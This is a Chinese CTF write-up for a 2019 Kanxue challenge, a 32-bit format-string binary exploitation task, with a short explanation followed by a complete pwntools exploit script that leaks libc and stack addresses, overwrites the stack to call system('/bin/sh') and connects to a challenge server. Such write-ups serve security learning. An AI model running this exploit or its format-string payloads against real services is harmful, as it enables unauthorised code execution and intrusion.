-
-
[原创]【2019看雪CTF】Q2赛季 第三题 金字塔的诅咒 WP
-
2019-7-2 00:12 4892
-
【2019看雪CTF】Q2赛季 第三题 金字塔的诅咒 WP
此题是比较简单的fmt类型的pwn题(此赛季唯一一个libc2.23的pwn题)。
因为是32位的elf,所以一切要简单得多,只不过有两个小小的限制,一是输入存放在bss上,而且是开PIE的;二是每次输入要求不大于24字节。
大概思路是:(都是fmt的利用)从栈上leak出libc地址和栈地址(栈上有ebp链,有了栈指针当然有栈地址),可通过ebp的栈指针构造指向其它栈地址的栈指针,从而实现栈的任意写,最终在栈上构造好system
的rop实现get shell。
最终exp如下:
#!/usr/bin/env python from pwn import * s = lambda a: io.send(a) sa = lambda a, b: io.sendafter(a, b) st = lambda a, b: io.sendthen(a, b) sl = lambda a: io.sendline(a) sla = lambda a, b: io.sendlineafter(a, b) slt = lambda a, b: io.sendlinethen(a, b) r = lambda a=0x100: io.recv(a) rl = lambda: io.recvline() ru = lambda a: io.recvuntil(a) it = lambda: io.interactive() def pwn(): #flag{c6671fc0-cea3-42ef-8af0-c20c65f854be} libc_main_off = 0x18540 bin_off = 0x15902B sys_off = 0x3A940 # libc_main_off = 0x18540 # bin_off = 0x15BA0B # sys_off = 0x3Ada0 sla('Choice:','1') sla('to say:','%11$p%5$p') res = rl() libc_main_addr = int(res[2:10],16) - 247 stack_addr = int(res[12:20],16) sys_addr = libc_main_addr - libc_main_off + sys_off bin_addr = libc_main_addr - libc_main_off + bin_off log.info('sys addr :'+hex(sys_addr)) sla('Choice:','1') sla('to say:','%%%dc%%5$hn'%((stack_addr-0x98)&0xffff)) sla('Choice:','1') sla('to say:','%%%dc%%53$hn'%((sys_addr)&0xffff)) sla('Choice:','1') sla('to say:','%%%dc%%5$hn'%((stack_addr-0x98+2)&0xffff)) sla('Choice:','1') sla('to say:','%%%dc%%53$hn'%((sys_addr>>16)&0xffff)) sla('Choice:','1') sla('to say:','%%%dc%%5$hn'%((stack_addr-0x90)&0xffff)) sla('Choice:','1') sla('to say:','%%%dc%%53$hn'%((bin_addr)&0xffff)) sla('Choice:','1') sla('to say:','%%%dc%%5$hn'%((stack_addr-0x90+2)&0xffff)) sla('Choice:','1') sla('to say:','%%%dc%%53$hn'%((bin_addr>>16)&0xffff)) # gdb.attach(io,'b main') sla('Choice:','2') it() if __name__ == '__main__': context(arch='i386', kernel='i386', os='linux') HOST, PORT = '152.136.18.34', 9999 # elf = ELF('./libc.so.6') if len(sys.argv) > 1 and sys.argv[1] == 'l': io = process('./format')#,env = {'LD_PRELOAD':'./libc.so.6'}) context.log_level = 'debug' else: io = remote(HOST, PORT) # context.log_level = 'debug' pwn()
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
赞赏
他的文章
看原图